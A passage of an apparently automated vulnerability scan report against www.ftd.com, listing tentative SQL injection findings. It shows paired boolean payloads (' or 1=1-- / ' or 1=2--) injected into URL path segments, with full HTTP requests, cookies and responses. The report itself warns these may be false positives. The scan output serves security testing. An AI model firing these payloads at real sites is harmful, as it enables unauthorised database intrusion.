X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:01:21 GMT
X-Varnish: 869409779
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.19. http://www.ftd.com/empty/index.epl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11276003'%20or%201%3d1--%20 and 11276003'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty/index.epl11276003'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 419
Date: Mon, 09 May 2011 01:03:13 GMT
X-Varnish: 1301377694
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 1301377694</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty/index.epl11276003'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:03:14 GMT
X-Varnish: 540321110
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.20. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 17774407'%20or%201%3d1--%20 and 17774407'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty17774407'%20or%201%3d1--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:40 GMT
X-Varnish: 750156331
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750156331</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty17774407'%20or%201%3d2--%20/tealeaf.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:06:41 GMT
X-Varnish: 540333250
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.21. http://www.ftd.com/empty/tealeaf.epl [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/tealeaf.epl

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 14521499'%20or%201%3d1--%20 and 14521499'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /empty/tealeaf.epl14521499'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:34 GMT
X-Varnish: 729992096
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729992096</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

POST /empty/tealeaf.epl14521499'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
X-TeaLeaf-Page-Objects: 0
Origin: http://www.ftd.com
X-TeaLeaf-Page-Img-Fail: 3
X-TeaLeaf-Page-Render: 9226
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2009.04.03.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: undefined; INIT
X-TeaLeaf-Page-Url: /
X-TeaLeaf-Browser-Res: 3
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902864856
Content-Length: 1245

<ClientEvent count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID20H0M25S760R0.6967325278092176" TimeDuration="9226" DateSince1970="1304902834986" >
<Info PageLoadMilliSecs="9226" Version="2009.0
...[SNIP]...

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123193
Date: Mon, 09 May 2011 01:08:35 GMT
X-Varnish: 1301398466
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe
...[SNIP]...

1.22. http://www.ftd.com/pics/counter.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15813113'%20or%201%3d1--%20 and 15813113'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics15813113'%20or%201%3d1--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:06:31 GMT
X-Varnish: 869426411
Age: 13
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869426411</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics15813113'%20or%201%3d2--%20/counter.gif?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123191
Date: Mon, 09 May 2011 01:06:32 GMT
X-Varnish: 869427079
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.23. http://www.ftd.com/pics/counter.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /pics/counter.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17406797'%20or%201%3d1--%20 and 17406797'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /pics/counter.gif17406797'%20or%201%3d1--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; fsr.a=1304902828764; c1=%7B%22referrer_before_redirect%22%3A%22%22%2C%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:33 GMT
X-Varnish: 729991704
Age: 20
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729991704</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /pics/counter.gif17406797'%20or%201%3d2--%20?markcode=351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
